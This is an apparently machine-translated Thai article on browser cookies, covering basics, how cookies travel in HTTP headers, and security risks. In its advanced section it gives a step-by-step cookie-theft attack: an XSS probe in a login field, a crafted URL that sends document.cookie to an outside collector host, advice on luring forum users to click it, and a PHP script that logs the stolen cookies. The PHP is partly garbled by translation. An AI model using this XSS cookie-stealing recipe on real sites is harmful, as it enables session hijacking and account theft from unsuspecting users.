Cookie หมายถึงของหวานชิ้นเล็กๆ ในภาษาอังกฤษ และเราสามารถเห็นคำนี้ในเบราว์เซอร์ได้ตลอดเวลา เมื่อคุณเรียกดูเว็บไซต์ที่คุณเคยเข้าสู่ระบบมาก่อน คุณอาจเห็นข้อความต่อไปนี้บนหน้าเว็บ: สวัสดี XX รู้สึกเป็นกันเองมากเหมือนกับการกินของหวานชิ้นเล็ก ๆ ซึ่งจริงๆ แล้วสามารถทำได้โดยการเข้าถึงไฟล์ในโฮสต์ของคุณ ดังนั้นไฟล์นี้จึงเรียกว่าคุกกี้ ต้องการทราบข้อมูลทั้งหมดเกี่ยวกับคุกกี้หรือไม่ ลองดูด้านล่าง!
1. ทำความเข้าใจกับออบเจ็กต์ที่ใช้กับคุกกี้: ผู้อ่านมือใหม่
คุกกี้เป็นไฟล์ข้อความขนาดเล็กที่เว็บไซต์จัดเก็บไว้ในเครื่องของคุณเมื่อคุณเรียกดูเว็บไซต์ โดยจะบันทึก ID ผู้ใช้ รหัสผ่าน หน้าเว็บที่เรียกดู เวลาที่ใช้ และข้อมูลอื่น ๆ เมื่อคุณมา ไปยังเว็บไซต์อีกครั้ง เว็บไซต์จะเรียนรู้ข้อมูลที่เกี่ยวข้องของคุณโดยการอ่านคุกกี้ และสามารถดำเนินการที่เกี่ยวข้อง เช่น การแสดงสโลแกนต้อนรับคุณบนเพจ หรืออนุญาตให้คุณเรียกดูได้โดยตรงโดยไม่ต้องป้อน ID หรือรหัสผ่านของคุณ และอีกมากมาย . คุณสามารถดูคุกกี้ทั้งหมดที่บันทึกไว้ในคอมพิวเตอร์ของคุณโดยเลือก "การตั้งค่า/ดูไฟล์" ในแท็บ "ทั่วไป" ของ "เครื่องมือ/ตัวเลือกอินเทอร์เน็ต" ใน IE ไฟล์เหล่านี้มักจะตั้งชื่อในรูปแบบ user@domain โดยที่ user คือชื่อผู้ใช้ในเครื่องของคุณ และโดเมนคือชื่อโดเมนของเว็บไซต์ที่คุณกำลังเยี่ยมชม หากคุณใช้เบราว์เซอร์ NetsCape มันจะถูกจัดเก็บไว้ใน "C:PROGRAMFILESNETSCAPEUSERS" แตกต่างจาก IE ตรงที่ NETSCAPE จะใช้ไฟล์คุกกี้เพื่อบันทึกคุกกี้ของเว็บไซต์ทั้งหมด
เพื่อให้มั่นใจถึงความปลอดภัยของอินเทอร์เน็ต เราจำเป็นต้องตั้งค่าคุกกี้อย่างเหมาะสม เปิดแท็บ "ความเป็นส่วนตัว" ใน "เครื่องมือ/ตัวเลือกอินเทอร์เน็ต" (โปรดทราบว่าการตั้งค่านี้มีเฉพาะใน IE6.0 เท่านั้น ส่วน IE เวอร์ชันอื่นๆ สามารถคลิก "ระดับที่กำหนดเอง" ในแท็บ "ความปลอดภัย" ของปุ่ม "เครื่องมือ/ตัวเลือกอินเทอร์เน็ต" เพื่อ ทำการปรับเปลี่ยนง่ายๆ) เพื่อปรับระดับความปลอดภัยของคุกกี้ โดยปกติคุณสามารถปรับแถบเลื่อนไปที่ตำแหน่ง "สูงปานกลาง" หรือ "สูง" ได้ เว็บไซต์ฟอรัมส่วนใหญ่กำหนดให้ใช้ข้อมูลคุกกี้ หากคุณไม่เคยไปที่สถานที่เหล่านี้ คุณสามารถปรับระดับความปลอดภัยเป็น "บล็อกคุกกี้ทั้งหมด" หากคุณเพียงต้องการบล็อกคุกกี้จากแต่ละเว็บไซต์ คุณสามารถคลิกปุ่ม "แก้ไข" เพื่อเพิ่มเว็บไซต์ที่คุณต้องการบล็อกลงในรายการ ในตัวเลือกปุ่ม "ขั้นสูง" คุณสามารถตั้งค่าคุกกี้ของบุคคลที่หนึ่งและคุกกี้ของบุคคลที่สามคือคุกกี้จากเว็บไซต์ที่คุณกำลังเรียกดู และคุกกี้ของบุคคลที่สามไม่ใช่คุกกี้ที่เว็บไซต์ที่คุณส่งถึงคุณ การเรียกดู โดยปกติคุณจะต้องเลือก "ปฏิเสธ" สำหรับคุกกี้ของบุคคลที่สาม ดังแสดงในรูปที่ 1 หากคุณต้องการบันทึกคุกกี้ คุณสามารถใช้ฟังก์ชัน "นำเข้าและส่งออก" ของ IE เปิด "ไฟล์/นำเข้าและส่งออก" แล้วปฏิบัติตามคำแนะนำ
เนื้อหาส่วนใหญ่ในคุกกี้ได้รับการเข้ารหัส ดังนั้นสำหรับเราแล้วดูเหมือนว่าเป็นเพียงการผสมผสานระหว่างตัวอักษรและตัวเลขที่ไม่มีความหมาย มีเพียงตัวจัดการ CGI ของเซิร์ฟเวอร์เท่านั้นที่รู้ความหมายที่แท้จริง เราสามารถดูเนื้อหาเพิ่มเติมได้ผ่านซอฟต์แวร์บางตัว ข้อมูลคุกกี้ที่ดูโดยใช้ซอฟต์แวร์ Cookie Pal แสดงในรูปที่ 2 โดยจะให้เนื้อหาของเซิร์ฟเวอร์ การหมดอายุ ชื่อ มูลค่า และตัวเลือกอื่นๆ แก่เรา หนึ่งในนั้นคือ Server คือเว็บไซต์ที่เก็บคุกกี้ Expires บันทึกเวลาและอายุการใช้งานของคุกกี้ และฟิลด์ชื่อและค่าเป็นข้อมูลเฉพาะ (หนังสือพิมพ์ฉบับนี้มีข้อมูลเบื้องต้นโดยละเอียดเกี่ยวกับซอฟต์แวร์นี้ในฉบับที่ 10 หน้า 42)
ที่อยู่การดาวน์โหลด: http://www.cbifamily.com/down/200411/cfnetwork/cp1.exe
2. กระบวนการจัดส่งคุกกี้ วัตถุที่เกี่ยวข้อง: ผู้อ่านระดับกลาง เมื่อพวกเขาพิมพ์ URL ของเว็บไซต์ในแถบที่อยู่ของเบราว์เซอร์ เบราว์เซอร์จะส่งคำขอเพื่ออ่านหน้าเว็บไปยังเว็บไซต์และแสดงผลลัพธ์บนจอภาพ ในขณะนี้ หน้าเว็บจะค้นหาไฟล์คุกกี้ที่เว็บไซต์ Amazon ตั้งค่าไว้บนคอมพิวเตอร์ของคุณ หากพบ เบราว์เซอร์จะส่งข้อมูลในไฟล์คุกกี้พร้อมกับ URL ที่ป้อนไว้ก่อนหน้านี้ไปยังเซิร์ฟเวอร์ของ Amazon เมื่อเซิร์ฟเวอร์ได้รับข้อมูลคุกกี้ เซิร์ฟเวอร์จะดึงข้อมูล ID ของคุณ บันทึกการซื้อของคุณ การตั้งค่าส่วนบุคคล และข้อมูลอื่น ๆ ในฐานข้อมูล บันทึกเนื้อหาใหม่ และเพิ่มลงในฐานข้อมูลและไฟล์คุกกี้ หากตรวจไม่พบคุกกี้หรือข้อมูลคุกกี้ของคุณไม่ตรงกับข้อมูลในฐานข้อมูล หมายความว่าคุณกำลังเรียกดูเว็บไซต์เป็นครั้งแรก และโปรแกรม CGI ของเซิร์ฟเวอร์จะสร้างข้อมูล ID ใหม่ให้กับคุณและบันทึกไว้ในฐานข้อมูล
คุกกี้จะถูกถ่ายโอนโดยใช้ข้อมูลส่วนหัว HTTP ในโค้ดของหน้าเว็บ คุกกี้สามารถถ่ายโอนพร้อมกับคำขอหน้าเว็บทุกรายการที่ทำโดยเบราว์เซอร์ ตัวอย่างเช่น เมื่อเบราว์เซอร์เปิดหรือรีเฟรชหน้าเว็บ เซิร์ฟเวอร์จะเพิ่มคุกกี้ลงในข้อมูลส่วนหัว HTTP ของหน้าเว็บ และส่งข้อมูลหน้าเว็บกลับไปยังเบราว์เซอร์ของคุณ เบราว์เซอร์จะเลือกว่าจะบันทึกข้อมูลนี้ตามการตั้งค่าคุกกี้บนคอมพิวเตอร์ของคุณหรือไม่ หากเบราว์เซอร์ไม่อนุญาตให้บันทึกคุกกี้ ข้อมูลจะหายไปหลังจากปิดเบราว์เซอร์ เวลาที่จัดเก็บคุกกี้บนคอมพิวเตอร์ของคุณจะแตกต่างออกไป ซึ่งจะถูกกำหนดโดยการตั้งค่าเซิร์ฟเวอร์ คุกกี้มีแอตทริบิวต์ Expires (ระยะเวลาที่ใช้ได้) ซึ่งกำหนดเวลาในการจัดเก็บคุกกี้ เซิร์ฟเวอร์สามารถเปลี่ยนเวลาจัดเก็บคุกกี้ได้โดยการตั้งค่าของช่อง Expires หากไม่ได้ตั้งค่าคุณลักษณะนี้ คุกกี้จะใช้งานได้เฉพาะในขณะที่ท่องเว็บเท่านั้น หากคุณปิดเบราว์เซอร์ คุกกี้เหล่านี้จะหายไปโดยอัตโนมัติ นี่เป็นกรณีของเว็บไซต์ส่วนใหญ่ โดยปกติ คุกกี้ประกอบด้วยฟิลด์ Server, Expires, Name และ Value เท่านั้น เนื้อหาของฟิลด์ Expires และฟิลด์อื่น ๆ เป็นเพียงการบอกเบราว์เซอร์ถึงวิธีการประมวลผลคุกกี้เหล่านี้
3. การใช้งานการเขียนโปรแกรมคุกกี้ วัตถุที่เกี่ยวข้อง: ผู้อ่านขั้นสูง ภาษาการเขียนโปรแกรมเว็บส่วนใหญ่ให้การสนับสนุนคุกกี้ เช่น JavaScript, VBScript, Delphi, ASP, SQL, PHP, C# เป็นต้น ในภาษาการเขียนโปรแกรมเชิงวัตถุเหล่านี้ การใช้งานการเขียนโปรแกรมของคุกกี้โดยพื้นฐานแล้วจะคล้ายคลึงกัน กระบวนการทั่วไปคือ: ขั้นแรกให้สร้างวัตถุคุกกี้ (วัตถุ) จากนั้นใช้ฟังก์ชันควบคุมเพื่อกำหนด อ่าน เขียน และดำเนินการอื่น ๆ ให้กับคุกกี้ แล้วจะรับข้อมูลที่ละเอียดอ่อนในคุกกี้ของผู้ใช้รายอื่นผ่านโค้ดได้อย่างไร? การแนะนำสั้น ๆ ดังต่อไปนี้
วิธีการนี้มีสองขั้นตอนหลัก ขั้นแรก ค้นหาเว็บไซต์ที่คุณต้องการรวบรวมคุกกี้ วิเคราะห์ และสร้าง URL จากนั้นรวบรวมโค้ด PHP เพื่อรวบรวมคุกกี้และวางไว้บนเว็บไซต์ที่คุณสามารถควบคุมได้โดยไม่ต้องรู้ รหัสสามารถดำเนินการได้หลังจากที่ผู้ใช้คลิก URL ที่คุณสร้าง มาดูกระบวนการใช้งานเฉพาะด้านล่างกัน
1. วิเคราะห์และสร้าง URL
ขั้นแรกให้เปิดเว็บไซต์ที่เราต้องการรวบรวมคุกกี้ ที่นี่เราถือว่ามันคือ http://www.XXX.net เข้าสู่ระบบเว็บไซต์และป้อนชื่อผู้ใช้ "<A1>" ( โดยไม่ต้องใส่เครื่องหมายคำพูด) เพื่อวิเคราะห์ข้อมูลและจับแพ็คเก็ต รับโค้ดในรูปแบบ "http://www.XXX.net/txl/login/login.pl?username=<A1>&passwd=&ok.x =28&ok.y=6" แทนที่ "<A1>" ลองอีกครั้งสำหรับ "<script>alert(document.cookie)</script>"; หากดำเนินการสำเร็จ ให้เริ่มสร้าง URL: "http://www .XXX.net/txl/login/login.pl?username=< script>window.open(" http://www.cbifamily.org/cbi.php?"%2Bdocument.cookie)</script>&passwd=&ok .x=28&ok.y=6 ". http://www.cbifamily.org/cbi.php เป็นสคริปต์บนโฮสต์บางตัวที่คุณสามารถควบคุมได้ ควรสังเกตว่า "%2B" คือการเข้ารหัส URL ของสัญลักษณ์ "+" เนื่องจาก "+" จะถือเป็นช่องว่าง สามารถโพสต์ URL ในฟอรัมเพื่อชักจูงให้ผู้อื่นคลิกได้
2. เตรียมสคริปต์ PHP
หน้าที่ของสคริปต์นี้คือการรวบรวมไฟล์คุกกี้ดังนี้
<?php
$info = getenv("QUERY_STRING");
ถ้า ($ข้อมูล) {
$fp = fopen("info.txt","a");
fwrite($fp,$info"n");
fclose($fp);
-
header("ตำแหน่ง: http://www.downcodes.com ");
?>
4. ปัญหาด้านความปลอดภัยของคุกกี้ วัตถุที่เกี่ยวข้อง: ผู้อ่านทุกคนที่ต้องการออนไลน์อย่างปลอดภัย
1. การหลอกลวง
คุกกี้ ข้อมูลบันทึกคุกกี้ เช่น ID บัญชีผู้ใช้และรหัสผ่าน หากส่งทางออนไลน์ โดยปกติจะใช้การเข้ารหัส MD5 แม้ว่าข้อมูลที่เข้ารหัสจะถูกดักจับโดยบางคนที่มีเจตนาแอบแฝงบนอินเทอร์เน็ต พวกเขาก็จะไม่สามารถเข้าใจได้เพราะพวกเขาเห็นเพียงตัวอักษรและตัวเลขที่ไม่มีความหมาย อย่างไรก็ตาม ปัญหาในขณะนี้คือผู้ที่ดักจับคุกกี้ไม่จำเป็นต้องทราบความหมายของสตริงเหล่านี้ พวกเขาเพียงแค่ส่งคุกกี้ของผู้อื่นไปยังเซิร์ฟเวอร์ และหากพวกเขาสามารถผ่านการตรวจสอบ พวกเขาสามารถแกล้งทำเป็นตัวตนของเหยื่อและ เข้าสู่เว็บไซต์ วิธีการนี้เรียกว่าการปลอมแปลงคุกกี้ ข้อกำหนดเบื้องต้นสำหรับการปลอมแปลงคุกกี้คือ มีช่องโหว่ในโปรแกรมการตรวจสอบของเซิร์ฟเวอร์ และผู้แอบอ้างต้องการรับข้อมูลคุกกี้ของบุคคลที่ถูกแอบอ้าง เป็นเรื่องยากมากสำหรับโปรแกรมการตรวจสอบเว็บไซต์ในปัจจุบันที่จะยกเว้นการเข้าสู่ระบบที่ผิดกฎหมายทั้งหมด ตัวอย่างเช่น ภาษาที่ใช้ในการเขียนโปรแกรมการตรวจสอบอาจมีช่องโหว่ ยิ่งไปกว่านั้น การได้รับคุกกี้ของผู้อื่นนั้นง่ายมาก คุณสามารถทำได้โดยการเขียนโค้ดเล็กๆ ในภาษาที่รองรับคุกกี้ (ดูรายละเอียดในวิธีที่ 3) ตราบใดที่โค้ดนี้ถูกวางบนเครือข่าย คุกกี้ของทุกคน สามารถรวบรวมได้ หากฟอรัมอนุญาตให้ใช้โค้ด HTML หรืออนุญาตให้ใช้แท็ก Flash คุณสามารถใช้เทคโนโลยีเหล่านี้เพื่อรวบรวมโค้ดคุกกี้และใส่ไว้ในฟอรัม จากนั้นให้ตั้งหัวข้อที่น่าสนใจให้กับโพสต์และเขียนเนื้อหาที่น่าสนใจ และคุณสามารถรวบรวมจำนวนมากได้อย่างรวดเร็ว ของคุกกี้ ในฟอรัม รหัสผ่านของผู้คนจำนวนมากถูกขโมยด้วยวิธีนี้ สำหรับวิธีการป้องกัน ขณะนี้ยังไม่มีวิธีแก้ไขเฉพาะเจาะจง เราสามารถใช้วิธีการป้องกันตามปกติเท่านั้น อย่าใช้รหัสผ่านที่สำคัญในฟอรัม อย่าใช้ฟังก์ชัน IE เพื่อบันทึกรหัสผ่านโดยอัตโนมัติ และพยายามไม่ลงชื่อเข้าใช้เว็บไซต์ โดยที่คุณไม่ทราบรายละเอียด
2. อันตรายที่ซ่อนอยู่ในโค้ด Flash
มีฟังก์ชัน getURL() ใน Flash สามารถใช้ฟังก์ชันนี้เพื่อเปิดหน้าเว็บที่ระบุได้โดยอัตโนมัติ ดังนั้นมันอาจนำคุณไปสู่เว็บไซต์ที่มีโค้ดที่เป็นอันตราย ตัวอย่างเช่น เมื่อคุณเพลิดเพลินกับภาพเคลื่อนไหว Flash ที่สวยงามบนคอมพิวเตอร์ของคุณ โค้ดในเฟรมภาพเคลื่อนไหวอาจเชื่อมต่อกับอินเทอร์เน็ตอย่างเงียบๆ และเปิดหน้าเว็บขนาดเล็กมากที่มีโค้ดพิเศษ หน้านี้สามารถรวบรวมคุกกี้ของคุณและทำสิ่งอื่น ๆ เช่น การฝังโทรจันบนเครื่องของคุณ หรือแม้แต่การฟอร์แมตฮาร์ดไดรฟ์ของคุณ เป็นต้น เว็บไซต์ไม่สามารถห้ามพฤติกรรมนี้ของ Flash ได้ เนื่องจากเป็นพฤติกรรมภายในของไฟล์ Flash สิ่งที่เราทำได้คือพยายามเปิดไฟร์วอลล์หากคุณเรียกดูในเครื่อง หากไฟร์วอลล์แจ้งให้คุณทราบว่าแพ็กเก็ตข้อมูลที่ส่งออกไป จะเป็นการดีที่สุดที่จะแบนข้อมูลเหล่านั้น หากคุณต้องการเพลิดเพลินบนอินเทอร์เน็ต วิธีที่ดีที่สุดคือค้นหาเว็บไซต์ขนาดใหญ่ที่มีชื่อเสียง